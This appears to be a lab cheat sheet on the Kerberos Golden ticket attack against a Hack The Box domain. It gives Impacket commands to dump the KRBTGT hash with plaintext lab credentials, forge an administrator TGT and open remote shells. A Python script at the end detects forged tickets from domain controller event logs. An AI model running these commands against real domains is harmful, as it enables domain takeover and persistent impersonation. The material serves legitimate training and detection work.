Golden ticket

The Golden ticket attack is a persistence attack that allows an attacker to impersonate any user on the domain by forging a TGT. Once the rogue TGT is created, the attacker can access any service on the domain as the user the TGT was created for!

Elements needed:

  1. KRBTGT hash

  2. SID of the domain

  3. Username to impersonate

  4. The domain FQDN

STEPS - Remotely with Impacket

1. KRBTGT hash

This is the hardest part to obtain, as we usually need to be a domain admin to dump the KRBTGT hash. For example, we can use mimikatz or the impacket-secretsdump script.

impacket-secretsdump htb.local/amandine:AAAaaa111@10.10.10.161

2. Get the domain SID

With the PowerView module loaded on the target system, run:

Get-ADDomain

3. Use impacket-ticketer to create the ticket remotely

root@kali# impacket-ticketer -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local administrator

4. Point the KRB5CCNAME environment variable at the Golden ticket's ccache file.

root@kali# export KRB5CCNAME=administrator.ccache

5. Log in as administrator using psexec or wmiexec

Adding the target system's hostname and the domain to the /etc/hosts file avoids a lot of errors, since Kerberos needs the service hostname to resolve.

root@kali# impacket-psexec htb.local/administrator@forest -k -no-pass
OR
root@kali# impacket-wmiexec htb.local/administrator@forest -k -no-pass
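From the defender's side, the forged TGT above is created offline and never goes through the KDC's AS exchange, so the domain controller logs service-ticket requests (event 4769) for the impersonated account without a matching TGT request (event 4768). The following Python script, added here and not part of the original notes, runs that check over a few constructed, simplified log records; real events would have to be extracted from the DC's security log first.

```python
"""Flag Kerberos service-ticket requests that have no preceding TGT request.

A forged (golden) TGT is built offline, so the domain controller never
logs a 4768 (TGT requested) for it; only 4769s (service tickets requested
with that TGT) appear. Added example with constructed, simplified records,
not code from the original notes.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, event id, account, client ip).
# Real DC security-log events carry these fields, but in XML/EVTX form.
SAMPLE_EVENTS = [
    ("2024-01-10 09:00:05", 4768, "amandine", "10.10.14.5"),
    ("2024-01-10 09:00:06", 4769, "amandine", "10.10.14.5"),
    ("2024-01-10 09:02:11", 4769, "administrator", "10.10.14.9"),  # no 4768 before it
    ("2024-01-10 09:02:12", 4769, "administrator", "10.10.14.9"),
]

WINDOW = timedelta(hours=10)  # AD default "Maximum lifetime for user ticket"


def parse(rec):
    """Turn one constructed record into (datetime, event id, account, ip)."""
    ts, event_id, account, ip = rec
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), event_id, account.lower(), ip


def tgs_without_tgt(events, window=WINDOW):
    """Return {(account, ip): count} of 4769s not preceded by a 4768 within window."""
    last_tgt = {}
    flagged = defaultdict(int)
    for ts, event_id, account, ip in sorted(parse(e) for e in events):
        key = (account, ip)
        if event_id == 4768:
            last_tgt[key] = ts
        elif event_id == 4769:
            seen = last_tgt.get(key)
            if seen is None or ts - seen > window:
                flagged[key] += 1
    return dict(flagged)


if __name__ == "__main__":
    for (account, ip), n in tgs_without_tgt(SAMPLE_EVENTS).items():
        print(f"{account}@{ip}: {n} service-ticket request(s) without a TGT request")
```

A legitimate TGT issued before log collection started will also be flagged, so treat hits as leads to correlate with the source host and logon details rather than as proof of a forged ticket.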
